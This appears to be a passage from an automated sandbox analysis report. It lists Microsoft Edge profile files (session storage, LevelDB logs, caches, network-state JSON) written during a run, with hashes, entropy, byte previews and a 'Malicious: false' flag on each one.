MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:RNBtAyXl/lKtn/lxEwltSt1Zln:3jKWQc5l
MD5:	21A275775161FCA9C434ACBA8EDC7468
SHA1:	F8FCBD8F7B725821EEA23A9F5AB89228B2144726
SHA-256:	4118798F5BC9B55825C4F52ADB21C7B0362162C81D55FFC22BF41D93F65F122F
SHA-512:	938576F62DA09E54A6A67F2CE836E584A7EB131131945BDCF25C0772C90DD5303B3A14EA772085958A38F210E29FFBB257E267737730FD421FB4CA930DE12D9F
Malicious:	false
Preview:	@....(.hoy retne.........................X....,................PB..f./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:RNBtAyXl/lKtn/lxEwltSt1Zln:3jKWQc5l
MD5:	21A275775161FCA9C434ACBA8EDC7468
SHA1:	F8FCBD8F7B725821EEA23A9F5AB89228B2144726
SHA-256:	4118798F5BC9B55825C4F52ADB21C7B0362162C81D55FFC22BF41D93F65F122F
SHA-512:	938576F62DA09E54A6A67F2CE836E584A7EB131131945BDCF25C0772C90DD5303B3A14EA772085958A38F210E29FFBB257E267737730FD421FB4CA930DE12D9F
Malicious:	false
Preview:	@....(.hoy retne.........................X....,................PB..f./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF42b33.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:RNBtAyXl/lKtn/lxEwltSt1Zln:3jKWQc5l
MD5:	21A275775161FCA9C434ACBA8EDC7468
SHA1:	F8FCBD8F7B725821EEA23A9F5AB89228B2144726
SHA-256:	4118798F5BC9B55825C4F52ADB21C7B0362162C81D55FFC22BF41D93F65F122F
SHA-512:	938576F62DA09E54A6A67F2CE836E584A7EB131131945BDCF25C0772C90DD5303B3A14EA772085958A38F210E29FFBB257E267737730FD421FB4CA930DE12D9F
Malicious:	false
Preview:	@....(.hoy retne.........................X....,................PB..f./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5965
Entropy (8bit):	3.43313218451965
Encrypted:	false
SSDEEP:	96:wKANV456GISN2b840sCkO2buwG9Xp+oTX+dibH5bjLl9iSr/1TzjXrcN:Qm5T1i5K9Xp+cXqij5bjLl9iSr/hHgN
MD5:	20116CCA091E21C5F7F8158485B94475
SHA1:	7B22B1BFCDC195BBB9375EDC964084AA907634AC
SHA-256:	B6F5580EB68D94694EB39624D5ABCADECEFB37303B88CEDA973130CEA99DE4FC
SHA-512:	D9D58F7C44118600C4F8071131F1EED965DFEE577DA39FC81D5309973E9D0B7107883A68BA67E75AB8BFAD8E332338FDFA5F216C421961F71D6F1998B40A9749
Malicious:	false
Preview:	...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............p..b................next-map-id.1.Cnamespace-eb691fb8_3999_4853_ab02_993e64d7fb3a-https://ntp.msn.com/.0F..#.................map-0-shd_sweeper.+{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.t.q.l.t.c.,.p.r.g.-.h.p.-.d.i.s.p.o.l.l.,.p.r.g.-.c.a.l.-.5.c.o.l.u.m.n.,.x.a.d.s.-.a.d.q.i.s.o.n.l.y.2.-.t.,.p.r.g.-.i.n.f.o.p.-.a.d.s.-.d.l.-.t.2.,.p.r.g.-.s.p.-.l.a.y.o.u.t.,.i.c.r.s.c.a.l.l.-.s.p.o.r.t.s.,.p.r.g.-.1.s.w.-.s.a.q.e.n.r.e.s.c.b.t.1.,.p.r.g.-.1.s.w.-.d.e.f.e.r.c.o.n.,.p.r.g.-.p.r.1.-.s.v.g.a.n.i.m.a.t.c.,.p.r.g.-.p.r.1.-.s.v.g.a.n.i.m.a.t.1.,.p.r.g.-.1.s.w.-.r.i.v.d.d.r.-.a.n.y.,.p.r.g.-.1.s.w.-.r.i.v.c.o.v.r.d.a.n.y.,.p.r.g.-.f.i.n.-.l.2.d.u.e.a.,.2.4.0.9.-.n.e.w.-.b.i.n.g.-.d.e.s.i.g.n.-.t.,.p.r.g.-.a.d.s.p.e.e.k.,.f.l.i.g.h.t.0.4.1.7.c.f._.4.,.t.r.a.f.f.i.c.-.p.r.2.-.n.e.w.s.,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.146808597994943
Encrypted:	false
SSDEEP:	6:HUtVAq2P923oH+TcwtrQMxIFUt8YUtWU4XZmw+YUtw7PkwO923oH+TcwtrQMFLJ:eAv4YebCFUt8P0/+k7P5LYebtJ
MD5:	22C727AC99392608B89ED2E56480A2A4
SHA1:	6058EB0D0C8730EEE911BBD9D6CE239893968121
SHA-256:	C04D5D9CAAC360ED74CB8C93EDD618A83D8811B64E5B7206C77DD132FF1F8C9B
SHA-512:	AD7DA5DF8B16E11C8C74D862F67B935CB90C2D3D59C5D478700AA6C8A62671A746D4037CD8CF439267D376835A69616F37AB8411F9023A927ACBC170A46035D8
Malicious:	false
Preview:	2024/11/13-14:39:37.218 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/13-14:39:37.220 1c64 Recovering log #3.2024/11/13-14:39:37.222 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.146808597994943
Encrypted:	false
SSDEEP:	6:HUtVAq2P923oH+TcwtrQMxIFUt8YUtWU4XZmw+YUtw7PkwO923oH+TcwtrQMFLJ:eAv4YebCFUt8P0/+k7P5LYebtJ
MD5:	22C727AC99392608B89ED2E56480A2A4
SHA1:	6058EB0D0C8730EEE911BBD9D6CE239893968121
SHA-256:	C04D5D9CAAC360ED74CB8C93EDD618A83D8811B64E5B7206C77DD132FF1F8C9B
SHA-512:	AD7DA5DF8B16E11C8C74D862F67B935CB90C2D3D59C5D478700AA6C8A62671A746D4037CD8CF439267D376835A69616F37AB8411F9023A927ACBC170A46035D8
Malicious:	false
Preview:	2024/11/13-14:39:37.218 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/13-14:39:37.220 1c64 Recovering log #3.2024/11/13-14:39:37.222 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13376000379202574

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.807153319244002
Encrypted:	false
SSDEEP:	24:3+r21CmlilLQye5psAF4unx97WtLp3X2amEtG1Chq16N/AQKkOAM4PUlP:3eEoQNzFt4Lp2FEkChs6N/RHOpj
MD5:	2B7394E44B6A3DA8BDD12DBA103863A4
SHA1:	32CC3E31CD2BF1C3758952FFBE9BDB18585C8201
SHA-256:	EA71ADBCC32F44DFBDB3C97EE88E97A32A72480007884AD13654C7A739F042CF
SHA-512:	0EA7465090A5A745B307DC61F4B47ADD4F12913D03C2516FC7E7C4218CAF54007340A34B5632BFEA1F8B8AC331E060E3D4E53ED4E770FA104D1B91445A261AFE
Malicious:	false
Preview:	SNSS........=.P............=.P......".=.P............=.P........=.P........=.P........=.P....!...=.P................................=.P.=.P1..,....=.P$...eb691fb8_3999_4853_ab02_993e64d7fb3a....=.P........=.P.....9.........=.P....=.P........................=.P....................5..0....=.P&...{98952893-68FF-4A5D-A164-705C709ED3DB}......=.P........=.P............=.P........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......b..~.&..c..~.&.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.179545830721035
Encrypted:	false
SSDEEP:	6:HUtcHUT+q2P923oH+Tcwt7Uh2ghZIFUt8YUtcfZZmw+YUtcfNVkwO923oH+Tcwts:3HUqv4YebIhHh2FUt8YR/+YL5LYebIh9
MD5:	169C421585D982947C8C08D4BF928B83
SHA1:	263D674C3022EE1DFD60D9D2007E7B684811F599
SHA-256:	1B02CF8E5FC4D03C3A7C1408BCDB666DB48E4FE5F23777D5E8367CCFF7C534F4
SHA-512:	6AADF070F8DB5BA629905AD471CF4E9893D77109FE7CDE3CB3B1682300EB8409927FD1A95C0075FCEB5A2D278FBE0FD4CF3AFD28F64E40559DD7618C6E4977C3
Malicious:	false
Preview:	2024/11/13-14:39:36.788 1e98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/13-14:39:36.789 1e98 Recovering log #3.2024/11/13-14:39:36.789 1e98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.179545830721035
Encrypted:	false
SSDEEP:	6:HUtcHUT+q2P923oH+Tcwt7Uh2ghZIFUt8YUtcfZZmw+YUtcfNVkwO923oH+Tcwts:3HUqv4YebIhHh2FUt8YR/+YL5LYebIh9
MD5:	169C421585D982947C8C08D4BF928B83
SHA1:	263D674C3022EE1DFD60D9D2007E7B684811F599
SHA-256:	1B02CF8E5FC4D03C3A7C1408BCDB666DB48E4FE5F23777D5E8367CCFF7C534F4
SHA-512:	6AADF070F8DB5BA629905AD471CF4E9893D77109FE7CDE3CB3B1682300EB8409927FD1A95C0075FCEB5A2D278FBE0FD4CF3AFD28F64E40559DD7618C6E4977C3
Malicious:	false
Preview:	2024/11/13-14:39:36.788 1e98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/13-14:39:36.789 1e98 Recovering log #3.2024/11/13-14:39:36.789 1e98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEflvo:/M/xT02z8o
MD5:	5F46EC1E6A40028BEEFA289F816A138C
SHA1:	FA097AC8BDCEFD504297201DC1F63EEE3DE5035D
SHA-256:	4CF0D6EB29167F732BE11BFD90FEBD8D27E6C8230159738278E1F246B1F93BD4
SHA-512:	8CCAC419DC606AF2798E3E7D050110FABAEECC113A010048A846B7A01706F975CF7CE90353150CC3B29F09F1D0D1092DB3D883666CF7AD1901391075F1D0FB46
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.263016834600109
Encrypted:	false
SSDEEP:	6:HUtfq2P923oH+TcwtzjqEKj3K/2jMGIFUt8YUtjXZmw+YUttHzkwO923oH+Tcwt8:kv4YebvqBQFUt8XX/+pHz5LYebvqBvJ
MD5:	7204EDE2082F65F2E21DDE38BBFD22A6
SHA1:	5D35C31E3380C1D4F038E6400A60E9C4B5AB5F53
SHA-256:	46EFF73ED3E708C29738E3037CAC7ED105A67BA7146F8219B20607FBFA969EBF
SHA-512:	10522D58F0676D955A055F2D9EB811DC6F0C1ED55886E212B87E05EF998DA0E7927AFAAC328F329DE383FB11E94119B886A0F8F22F55DC5590F16450C9DCC038
Malicious:	false
Preview:	2024/11/13-14:39:37.561 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/13-14:39:37.562 1c64 Recovering log #3.2024/11/13-14:39:37.566 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.263016834600109
Encrypted:	false
SSDEEP:	6:HUtfq2P923oH+TcwtzjqEKj3K/2jMGIFUt8YUtjXZmw+YUttHzkwO923oH+Tcwt8:kv4YebvqBQFUt8XX/+pHz5LYebvqBvJ
MD5:	7204EDE2082F65F2E21DDE38BBFD22A6
SHA1:	5D35C31E3380C1D4F038E6400A60E9C4B5AB5F53
SHA-256:	46EFF73ED3E708C29738E3037CAC7ED105A67BA7146F8219B20607FBFA969EBF
SHA-512:	10522D58F0676D955A055F2D9EB811DC6F0C1ED55886E212B87E05EF998DA0E7927AFAAC328F329DE383FB11E94119B886A0F8F22F55DC5590F16450C9DCC038
Malicious:	false
Preview:	2024/11/13-14:39:37.561 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/13-14:39:37.562 1c64 Recovering log #3.2024/11/13-14:39:37.566 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\011f0c69-8fcb-4eff-9345-a2e47de4783e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\1193dc67-348d-4428-8238-da5f2ca24658.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5a734e13-b377-4cbe-b250-cf277e0ed973.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\623faaef-52f4-4665-8e77-6fcde3e55212.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\65242bce-1e2a-4f15-af0e-00e325fc4f16.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\89b20f52-2e11-4649-9de3-821799e48da8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
MD5:	ABE81C38891A875B52127ACE9C314105
SHA1:	8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
SHA-256:	6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
SHA-512:	B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF69f8e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3c1ea.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF54c81.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
